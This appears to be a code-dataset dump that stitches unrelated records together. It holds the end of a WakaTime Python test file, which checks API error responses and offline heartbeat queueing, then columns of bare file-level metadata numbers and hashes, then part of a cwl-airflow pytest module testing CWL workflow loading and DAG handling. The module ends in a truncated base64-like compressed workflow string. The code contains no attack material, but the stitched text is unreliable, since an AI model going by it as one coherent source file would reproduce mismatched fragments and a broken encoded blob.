u('language'): u('Text only'),
u('lineno'): None,
u('lines'): 2,
}
self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(heartbeat, ANY, None)
self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
def test_hidden_filename(self):
response = Response()
response.status_code = 0
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
now = u(int(time.time()))
entity = 'tests/samples/codefiles/twolinefile.txt'
config = 'tests/samples/configs/paranoid.cfg'
args = ['--file', entity, '--key', '123', '--config', config, '--time', now]
retval = execute(args)
self.assertEquals(retval, 102)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
heartbeat = {
'language': 'Text only',
'lines': 2,
'entity': 'HIDDEN.txt',
'project': os.path.basename(os.path.abspath('.')),
'branch': os.environ.get('TRAVIS_COMMIT', ANY),
'time': float(now),
'type': 'file',
}
stats = {
u('cursorpos'): None,
u('dependencies'): [],
u('language'): u('Text only'),
u('lineno'): None,
u('lines'): 2,
}
self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(heartbeat, ANY, None)
self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
def test_500_response(self):
response = Response()
response.status_code = 500
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
now = u(int(time.time()))
args = ['--file', 'tests/samples/codefiles/twolinefile.txt', '--key', '123',
'--config', 'tests/samples/configs/paranoid.cfg', '--time', now]
retval = execute(args)
self.assertEquals(retval, 102)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
heartbeat = {
'language': 'Text only',
'lines': 2,
'entity': 'HIDDEN.txt',
'project': os.path.basename(os.path.abspath('.')),
'branch': os.environ.get('TRAVIS_COMMIT', ANY),
'time': float(now),
'type': 'file',
}
stats = {
u('cursorpos'): None,
u('dependencies'): [],
u('language'): u('Text only'),
u('lineno'): None,
u('lines'): 2,
}
self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(heartbeat, ANY, None)
self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
def test_400_response(self):
response = Response()
response.status_code = 400
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
now = u(int(time.time()))
args = ['--file', 'tests/samples/codefiles/twolinefile.txt', '--key', '123',
'--config', 'tests/samples/configs/paranoid.cfg', '--time', now]
retval = execute(args)
self.assertEquals(retval, 102)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
def test_alternate_project(self):
response = Response()
response.status_code = 0
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
now = u(int(time.time()))
entity = 'tests/samples/codefiles/twolinefile.txt'
config = 'tests/samples/configs/sample.cfg'
args = ['--file', entity, '--alternate-project', 'xyz', '--config', config, '--time', now]
retval = execute(args)
self.assertEquals(retval, 102)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
heartbeat = {
'language': 'Text only',
'lines': 2,
'entity': os.path.abspath(entity),
'project': os.path.basename(os.path.abspath('.')),
'branch': os.environ.get('TRAVIS_COMMIT', ANY),
'time': float(now),
'type': 'file',
}
stats = {
u('cursorpos'): None,
u('dependencies'): [],
u('language'): u('Text only'),
u('lineno'): None,
u('lines'): 2,
}
self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(heartbeat, ANY, None)
self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
def test_set_project_from_command_line(self):
response = Response()
response.status_code = 0
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
now = u(int(time.time()))
entity = 'tests/samples/codefiles/twolinefile.txt'
config = 'tests/samples/configs/sample.cfg'
args = ['--file', entity, '--project', 'xyz', '--config', config, '--time', now]
retval = execute(args)
self.assertEquals(retval, 102)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
heartbeat = {
'language': 'Text only',
'lines': 2,
'entity': os.path.abspath(entity),
'project': 'xyz',
'branch': os.environ.get('TRAVIS_COMMIT', ANY),
'time': float(now),
'type': 'file',
}
stats = {
u('cursorpos'): None,
u('dependencies'): [],
u('language'): u('Text only'),
u('lineno'): None,
u('lines'): 2,
}
self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(heartbeat, ANY, None)
self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
def test_missing_entity_file(self):
response = Response()
response.status_code = 201
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
entity = 'tests/samples/codefiles/missingfile.txt'
config = 'tests/samples/configs/sample.cfg'
args = ['--file', entity, '--config', config]
retval = execute(args)
self.assertEquals(retval, 0)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
| 41.763231
| 110
| 0.639699
| 1,633
| 14,993
| 5.730557
| 0.085119
| 0.077581
| 0.134003
| 0.116264
| 0.918679
| 0.8972
| 0.887155
| 0.877324
| 0.86557
| 0.86557
| 0
| 0.007197
| 0.212232
| 14,993
| 358
| 111
| 41.879888
| 0.785116
| 0.001401
| 0
| 0.786207
| 0
| 0
| 0.303474
| 0.241283
| 0
| 0
| 0
| 0
| 0.32069
| 1
| 0.041379
| false
| 0
| 0.048276
| 0
| 0.096552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3be1d6766eeb1da4e1209986cd295cd6f5db8976
| 106,692
|
py
|
Python
|
tests/test_cwl.py
|
mdrio/cwl-airflow
|
e78bd7269f8273115ecc622c1cf8e4487656fd5d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_cwl.py
|
mdrio/cwl-airflow
|
e78bd7269f8273115ecc622c1cf8e4487656fd5d
|
[
"Apache-2.0"
] | 2
|
2022-01-28T21:58:42.000Z
|
2022-03-01T23:11:44.000Z
|
tests/test_cwl.py
|
mdrio/cwl-airflow
|
e78bd7269f8273115ecc622c1cf8e4487656fd5d
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
import shutil
import pytest
import tempfile
import importlib
from ruamel.yaml.comments import CommentedMap
from cwltool.workflow import Workflow
from cwltool.command_line_tool import CommandLineTool
from schema_salad.exceptions import SchemaSaladException
from cwl_airflow.utilities.helpers import (
get_md5_sum,
get_absolute_path,
get_rootname,
get_compressed,
get_dir
)
from cwl_airflow.utilities.cwl import (
fast_cwl_load,
slow_cwl_load,
get_temp_folders,
load_job,
get_items,
get_short_id,
execute_workflow_step,
embed_all_runs,
convert_to_workflow,
get_default_cwl_args,
overwrite_deprecated_dag,
get_containers,
CWL_TMP_FOLDER,
CWL_INPUTS_FOLDER,
CWL_OUTPUTS_FOLDER,
CWL_PICKLE_FOLDER,
CWL_USE_CONTAINER,
CWL_NO_MATCH_USER,
CWL_SKIP_SCHEMAS,
CWL_STRICT,
CWL_QUIET,
CWL_RM_TMPDIR,
CWL_MOVE_OUTPUTS
)
DATA_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), "data"))
if sys.platform == "darwin": # docker has troubles of mounting /var/private on macOs
tempfile.tempdir = "/private/tmp"
@pytest.mark.parametrize(
"task_id, cidfiles, control_containers",
[
(
"bam_to_bedgraph",
[
"dummy_1.cid",
"dummy_2.cid"
],
{
"43dd79ede44946a1954d27327000d1c013cb39196c096ce70bc158ee7531a557": "dummy_1.cid",
"000d1c013cb39196c096ce70bc158ee7531a55743dd79ede44946a1954d27327": "dummy_2.cid"
}
),
(
"bam_to_bedgraph",
[
"dummy_1.cid"
],
{
"43dd79ede44946a1954d27327000d1c013cb39196c096ce70bc158ee7531a557": "dummy_1.cid"
}
),
(
"bam_to_bedgraph",
[],
{}
)
]
)
def test_get_containers(task_id, cidfiles, control_containers, monkeypatch):
temp_home = tempfile.mkdtemp()
monkeypatch.delenv("AIRFLOW_HOME", raising=False)
monkeypatch.delenv("AIRFLOW_CONFIG", raising=False)
monkeypatch.setattr(
os.path,
"expanduser",
lambda x: x.replace("~", temp_home)
)
for cidfile in cidfiles:
shutil.copy(
os.path.join(DATA_FOLDER, "cid", cidfile),
get_dir(os.path.join(temp_home, task_id))
)
try:
containers = get_containers({"tmp_folder": temp_home}, task_id)
control_containers = {
cid: os.path.join(temp_home, task_id, filename)
for cid, filename in control_containers.items()
}
except (BaseException, Exception) as err:
assert False, f"Failed to run test. \n {err}"
finally:
shutil.rmtree(temp_home)
assert control_containers == containers, \
"Failed to find cidfiles"
@pytest.mark.parametrize(
"dag_location, workflow_location, control_deprecated_files",
[
(
os.path.join(DATA_FOLDER, "dags", "bam_bedgraph_bigwig_single_old_format.py"),
os.path.join(DATA_FOLDER, "workflows", "bam-bedgraph-bigwig-single.cwl"), # need it only to run test
["bam_bedgraph_bigwig_single_old_format.py", ".airflowignore"]
)
]
)
def test_overwrite_deprecated_dag(
dag_location,
workflow_location,
control_deprecated_files,
monkeypatch
):
temp_home = tempfile.mkdtemp()
monkeypatch.delenv("AIRFLOW_HOME", raising=False)
monkeypatch.delenv("AIRFLOW_CONFIG", raising=False)
monkeypatch.setattr(
os.path,
"expanduser",
lambda x: x.replace("~", temp_home)
)
dags_folder = get_dir(
os.path.join(temp_home, "airflow", "dags")
)
dag_location = shutil.copy(
dag_location,
os.path.join(
dags_folder,
os.path.basename(dag_location)
)
)
workflow_location = shutil.copy(
workflow_location,
os.path.join(
dags_folder,
os.path.basename(workflow_location)
)
)
deprecated_dags_folder = os.path.join(dags_folder, "deprecated_dags")
try:
overwrite_deprecated_dag(
dag_location=dag_location,
deprecated_dags_folder=deprecated_dags_folder
)
os.remove(workflow_location) # remove workflow file to make sure we are loading compressed workflow content
spec = importlib.util.spec_from_file_location(
get_rootname(dag_location),
dag_location
)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
deprecated_dags_folder_content = os.listdir(deprecated_dags_folder)
with open(
os.path.join(deprecated_dags_folder, ".airflowignore")
) as input_stream:
airflowignore_content = input_stream.read()
except (BaseException, Exception) as err:
assert False, f"Failed to run test. \n {err}"
finally:
shutil.rmtree(temp_home)
assert all(
deprecated_file in deprecated_dags_folder_content
for deprecated_file in control_deprecated_files
), "Failed to backup DAGs"
assert control_deprecated_files[0] in airflowignore_content, \
"Failed to update .airflowignore"
@pytest.mark.parametrize(
"workflow, job, skipped_control",
[
(
["tools", "bedtools-genomecov.cwl"],
"bedtools-genomecov.json",
False
),
(
["tools", "linux-sort.cwl"],
"linux-sort.json",
False
),
(
["tools", "ucsc-bedgraphtobigwig.cwl"],
"ucsc-bedgraphtobigwig.json",
False
)
]
)
def test_convert_to_workflow(workflow, job, skipped_control):
pickle_folder = tempfile.mkdtemp()
command_line_tool = slow_cwl_load(
workflow = os.path.join(DATA_FOLDER, *workflow),
only_tool=True
)
converted_workflow_path = os.path.join(pickle_folder, "workflow.cwl")
workflow_tool = convert_to_workflow(
command_line_tool=command_line_tool,
location=converted_workflow_path
)
try:
job_data = load_job(
workflow=converted_workflow_path,
job=os.path.join(DATA_FOLDER, "jobs", job),
cwl_args={"pickle_folder": pickle_folder}
)
job_data["tmp_folder"] = pickle_folder
step_outputs, step_report, skipped = execute_workflow_step(
workflow=converted_workflow_path,
task_id=get_rootname(command_line_tool["id"]),
job_data=job_data,
cwl_args={"pickle_folder": pickle_folder}
)
if skipped != skipped_control:
raise ValueError("Workflow didn't follow skipping rule")
except ValueError as err:
assert False, f"Failed to execute the workflow. \n {err}"
except BaseException as err:
assert False, f"Failed to run the test. \n {err}"
finally:
shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"control_defaults",
[
(
{
"tmp_folder": CWL_TMP_FOLDER,
"inputs_folder": CWL_INPUTS_FOLDER,
"outputs_folder": CWL_OUTPUTS_FOLDER,
"pickle_folder": CWL_PICKLE_FOLDER,
"use_container": CWL_USE_CONTAINER,
"no_match_user": CWL_NO_MATCH_USER,
"skip_schemas": CWL_SKIP_SCHEMAS,
"strict": CWL_STRICT,
"quiet": CWL_QUIET,
"rm_tmpdir": CWL_RM_TMPDIR,
"move_outputs": CWL_MOVE_OUTPUTS
}
)
]
)
def test_get_default_cwl_args(monkeypatch, control_defaults):
temp_home = tempfile.mkdtemp()
monkeypatch.delenv("AIRFLOW_HOME", raising=False)
monkeypatch.delenv("AIRFLOW_CONFIG", raising=False)
monkeypatch.setattr(
os.path,
"expanduser",
lambda x: x.replace("~", temp_home)
)
try:
required_cwl_args = get_default_cwl_args()
except (BaseException, Exception) as err:
assert False, f"Failed to run test. \n {err}"
finally:
shutil.rmtree(temp_home)
assert all(
required_cwl_args[key] == contol_value
for key, contol_value in control_defaults.items()
), "Failed to set proper defaults"
@pytest.mark.parametrize(
"workflow, job, task_id, skipped_control",
[
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig-single.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig-subworkflow.cwl"],
"bam-bedgraph-bigwig.json",
"subworkflow",
False
)
]
)
def test_embed_all_runs(workflow, job, task_id, skipped_control):
pickle_folder = tempfile.mkdtemp()
packed_workflow_path = os.path.join(pickle_folder, "packed.cwl")
embed_all_runs(
workflow_tool=slow_cwl_load(
workflow = os.path.join(DATA_FOLDER, *workflow),
only_tool=True
),
location=packed_workflow_path
)
try:
job_data = load_job(
workflow=packed_workflow_path,
job=os.path.join(DATA_FOLDER, "jobs", job),
cwl_args={"pickle_folder": pickle_folder}
)
job_data["tmp_folder"] = pickle_folder
step_outputs, step_report, skipped = execute_workflow_step(
workflow=packed_workflow_path,
task_id=task_id,
job_data=job_data,
cwl_args={"pickle_folder": pickle_folder}
)
if skipped != skipped_control:
raise ValueError("Workflow didn't follow skipping rule")
except ValueError as err:
assert False, f"Failed to execute the workflow. \n {err}"
except BaseException as err:
assert False, f"Failed to run the test. \n {err}"
finally:
shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"long_id, only_step_name, only_id, control",
[
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/output_filename",
None,
None,
"sorted_bedgraph_to_bigwig/output_filename"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/output_filename",
True,
None,
"sorted_bedgraph_to_bigwig"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/output_filename",
None,
True,
"output_filename"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/output_filename",
True,
True,
""
),
(
"sorted_bedgraph_to_bigwig/output_filename",
None,
None,
"sorted_bedgraph_to_bigwig/output_filename"
),
(
"sorted_bedgraph_to_bigwig/output_filename",
True,
None,
"sorted_bedgraph_to_bigwig"
),
(
"sorted_bedgraph_to_bigwig/output_filename",
None,
True,
"output_filename"
),
(
"sorted_bedgraph_to_bigwig/output_filename",
True,
True,
""
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig-single.cwl#bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
None,
"bam_to_bedgraph/genome_coverage_file"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig-single.cwl#bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
None,
"bam_to_bedgraph"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig-single.cwl#bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
True,
"genome_coverage_file"
),
(
"file:///Users/tester/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig-single.cwl#bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
True,
""
),
(
"bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
None,
"bam_to_bedgraph/genome_coverage_file"
),
(
"bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
None,
"bam_to_bedgraph"
),
(
"bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
True,
"genome_coverage_file"
),
(
"bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
True,
""
),
(
"bam_to_bedgraph/run/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
None,
"bam_to_bedgraph/genome_coverage_file"
),
(
"bam_to_bedgraph/run/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
None,
"bam_to_bedgraph"
),
(
"bam_to_bedgraph/run/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
True,
"genome_coverage_file"
),
(
"bam_to_bedgraph/run/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
True,
""
),
(
"bam_to_bedgraph/run/command/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
None,
"bam_to_bedgraph/genome_coverage_file"
),
(
"bam_to_bedgraph/run/command/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
None,
"bam_to_bedgraph"
),
(
"bam_to_bedgraph/run/command/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
True,
"genome_coverage_file"
),
(
"bam_to_bedgraph/run/command/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
True,
""
),
(
"output_filename",
None,
None,
"output_filename"
),
(
"output_filename",
True,
None,
"output_filename"
),
(
"output_filename",
None,
True,
"output_filename"
),
(
"output_filename",
True,
True,
"output_filename"
)
]
)
def test_get_short_id(long_id, only_step_name, only_id, control):
result = get_short_id(long_id, only_step_name, only_id)
assert result == control, "Test failed"
# It's also indirect testing of fast_cwl_step_load
@pytest.mark.parametrize(
"workflow, job, task_id, skipped_control",
[
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
# bam-bedgraph-bigwig-single.cwl
"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\
